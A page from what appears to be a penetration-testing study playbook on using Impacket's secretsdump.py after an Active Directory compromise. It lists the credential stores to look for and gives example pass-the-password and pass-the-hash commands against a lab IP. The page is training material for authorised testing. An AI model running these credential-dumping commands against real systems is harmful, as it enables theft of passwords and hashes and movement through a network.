🖥️
Pentest Playbook
  • Pentest Playbook
  • Methodology
    • 🐘Pentest Methodology
  • Reconnaissance
    • 🦅Scanning and Enumeration
      • Host Discovery
      • Port Scan
  • Active Directory
    • 🐻Initial Attack Vectors
      • LLMNR Poisoning
      • SMB Relay
      • Gaining Shell Access
      • IPv6 Attack
    • 🐻‍❄️Post-Compromise Enumeration
      • LDAPDomainDump
      • BloodHound
      • PlumHound
      • PingCastle
    • 🐼Post-Compromise Attacks
      • CrackMapExec
      • SecretsDump
      • Kerberoasting
      • Token Impersonation
      • LNK File Attack
      • GPP or cPassword Attack
      • Mimikatz
  • Password Attacks
    • 🐱Hashcat
      • Hashcat for Windows
    • 🐠Hydra
    • 🐶John The Ripper
Powered by GitBook
On this page
  • Introduction
  • Pass-the-Password
  • Pass-the-Hash
  1. Active Directory
  2. Post-Compromise Attacks

SecretsDump

PreviousCrackMapExecNextKerberoasting

Last updated 1 year ago

Introduction

Important Information to look for:

  • SAM Hashes: Administrator account, Any other user.

  • Cached domain logon information.

  • Passwords can also be seen in clear text if there are services that are running that stores password in the registry.

  • Wdigest - Wdigest enables password to be stored in clear text. Enabled by default on Windows 7, 8, Server 2008 R2, Server 2012.

Pass-the-Password

Syntax: secretsdump.py [Domain]/[Username]:['password']@[IP]

secretsdump.py ALT/jjones:'buyme_200sx'@172.16.1.5

Pass-the-Hash

Syntax: secretsdump.py [Local Username]@[IP] -hashes [Hash]

secretsdump.py administrator@172.16.1.5 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
🐼
SecretsDump: Pass-the-Password
SecretsDump: Pass-the-Hash